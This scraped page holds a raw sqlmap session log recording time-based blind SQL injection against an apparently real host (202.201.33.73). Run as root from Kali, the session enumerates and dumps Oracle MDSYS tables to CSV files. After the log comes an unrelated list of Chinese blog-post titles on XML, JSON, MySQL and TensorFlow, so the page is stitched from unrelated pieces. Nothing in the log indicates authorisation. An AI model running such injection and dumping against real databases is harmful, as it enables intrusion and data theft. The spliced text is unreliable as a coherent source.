[11:45:47] [INFO] the SQL query used returns 4 entries
[11:45:47] [INFO] resumed: "SDO_OWNER","VARCHAR2"
[11:45:47] [INFO] resumed: "NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "DESCRIPTION","VARCHAR2"
[11:45:47] [INFO] resumed: "DEFINITION","CLOB"
[11:45:47] [INFO] fetching entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:47] [INFO] fetching number of entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:47] [INFO] resumed: 0
[11:45:47] [WARNING] table 'SDO_MAPS_TABLE' in database 'MDSYS' appears to be empty
Database: MDSYS
Table: SDO_MAPS_TABLE
[0 entries]
+------+-----------+------------+-------------+
| NAME | SDO_OWNER | DEFINITION | DESCRIPTION |
+------+-----------+------------+-------------+
+------+-----------+------------+-------------+
[11:45:47] [INFO] table 'MDSYS.SDO_MAPS_TABLE' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv'
[11:45:47] [INFO] fetching columns for table 'CS_SRS' in database 'MDSYS'
[11:45:47] [INFO] the SQL query used returns 6 entries
[11:45:47] [INFO] resumed: "CS_NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "SRID","NUMBER"
[11:45:47] [INFO] resumed: "AUTH_SRID","NUMBER"
[11:45:47] [INFO] resumed: "AUTH_NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "WKTEXT","VARCHAR2"
[11:45:47] [INFO] resumed: "CS_BOUNDS","SDO_GEOMETRY"
[11:45:47] [INFO] fetching entries for table 'CS_SRS' in database 'MDSYS'
[11:45:47] [INFO] the SQL query used returns 1000 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
^C
[11:48:11] [WARNING] user aborted during enumeration. sqlmap will display partial output
[11:48:11] [INFO] fetching number of entries for table 'CS_SRS' in database 'MDSYS'
[11:48:11] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:48:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
1000
[11:49:19] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
University of Arizona
[11:55:51] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
20
[11:56:40] [ERROR] invalid character detected. retrying..
0
[11:57:00] [ERROR] invalid character detected. retrying..
0001
[11:57:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
Martian Longitude/Latitude
[12:05:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
2000001
[12:06:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[12:07:16] [ERROR] invalid character detected. retrying..
GEOGCS [ "Mar
[12:11:45] [ERROR] invalid character detected. retrying..
tian Lon^C
[12:14:39] [WARNING] Ctrl+C detected in dumping phase
Database: MDSYS
Table: CS_SRS
[0 entries]
+---------+-----------+--------+----------------------------+-----------------------+-----------+
| SRID | AUTH_SRID | WKTEXT | CS_NAME | AUTH_NAME | CS_BOUNDS |
+---------+-----------+--------+----------------------------+-----------------------+-----------+
+---------+-----------+--------+----------------------------+-----------------------+-----------+
[12:14:39] [INFO] table 'MDSYS.CS_SRS' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/CS_SRS.csv'
[12:14:39] [INFO] fetching columns for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [INFO] the SQL query used returns 1 entries
[12:14:40] [INFO] fetching entries for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [INFO] fetching number of entries for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait...^X..........^C....^C
[12:14:46] [ERROR] user aborted
[*] shutting down at 12:14:46
root@kali-yaming:~#
sqlmap实例文档的更多相关文章
- XML实例文档
from: http://www.w3school.com.cn/xpath/xpath_examples.asp XML实例文档 我们将在下面的例子中使用这个 XML 文档: "books ...
- ZooKeeper----Java实例文档
**************************************************************************************************** ...
- RSS实例文档
<?xml version="1.0" encoding="ISO-8859-1" ?> <rss version="2.0&quo ...
- Visual FoxPro 6.0~9.0解决方案和实例文档和CD写入原件下载
自从微软宣布开发冻结Visual FoxPro之后,这样的图书出版已经成为一个问题,但仍有不少VFP小贴士.处处留心此8历史书.在此提供写作的原稿.它看起来非常舒服比扫描版淘宝.下载链接:http:/ ...
- 产品需求文档写作方法(三)用例文档(UML用例图、流程图)
在产品和技术领域里都有UML的技能知识,而对于产品人员的UML则更多的是指用例图,也就是我所称呼的用户流程图.在讲PRD文档写作的第二篇文章里,我提到了用户流程图的制作,实际上用户流程图是我在产品规则 ...
- 浅谈用java解析xml文档(三)
接上一篇,本文介绍使用JDOM解析xml文档, 首先我们还是应该知道JDOM从何而来,是Breet Mclaughlin和Jason Hunter两大Java高手的创作成果,2000年初, JDOM作 ...
- Android APP开发需求文档范本
Android APP开发需求文档范本 软件需求文档格式的标准写法 1.引言 1.1 编写目的 • 阐明开发本软件的目的: 1.2 项目背景 • 标识待开发软件产品的名称.代码: • 列出本项目的任 ...
- 通过XmlDocument读写Xml文档参考地址
/// <summary> /// 获取一个报表的参数 http://blog.csdn.net/hdhai9451/article/details/12170069 /// </s ...
- app开发需求文档怎么写
我们在开发app前都会做需求分析,这个app开发需求文档怎么写呢?一般可以从这几点入手:确定APP方案的目标,APP方案的受众分析,APP开发方案功能设计,APP的操作系统说明方案,APP是是否是原生 ...
随机推荐
- JSON格式说明
JSON的优点 相比XML拥有更简单的格式. 不同WEB浏览器处理的结果一样. 纯文本数据交换格式. JSON格式特点 {} 对象定义域 key:value 定义属性 key 字符串格式,value ...
- MGR架构~高可用架构细节的梳理
一 简介:今天咱们来聊聊mgr的细节原理相关 二 选择新主机制 1 当主节点宕掉,自动会根据服务器的server_uuid变量和group_replication_member_weight变量值 ...
- 如何在 JS 中嵌入大量 HTML 代码 --更新2017-10-10 16:37:09
一.一般方式 方式1:\ 要写在标签后面,看例子 var longString = "\ ------------------------\ ------------------------ ...
- MySql 在cmd下的学习笔记 —— 有关多表查询的操作(内连接,外连接,交叉连接)
mysql> create table test5( -> id int, ) -> )engine myisam charset utf8; Query OK, rows affe ...
- TensorFlow学习笔记之--[tf.clip_by_global_norm,tf.clip_by_value,tf.clip_by_norm等的区别]
以下这些函数可以用于解决梯度消失或梯度爆炸问题上. 1. tf.clip_by_value tf.clip_by_value( t, clip_value_min, clip_value_max, n ...
- PL/SQL 加字段 修改数据库之后 之后记得保存脚本
- [转] Understanding Convolutional Neural Networks for NLP
http://www.wildml.com/2015/11/understanding-convolutional-neural-networks-for-nlp/ 讲CNN以及其在NLP的应用,非常 ...
- 很清晰的解读i2c协议【转】
转自:https://blog.csdn.net/weixin_41718085/article/details/79376823 转载:http://dpinglee.blog.163.com/bl ...
- async_mongo_helper
# -*- coding: utf-8 -*- # @Time : 2019/1/7 2:11 PM # @Author : cxa # @File : motortesdt.py # @Softwa ...
- windows命令行获取时间
在写Windows批处理脚本时,常常需要获取系统日期.时间戳记,用作文件名.文件夹名.log等等. 本文介绍了如何获取自订的系统日期.时间戳记. 首先,在Windows中,系统日期由以下参数获得: % ...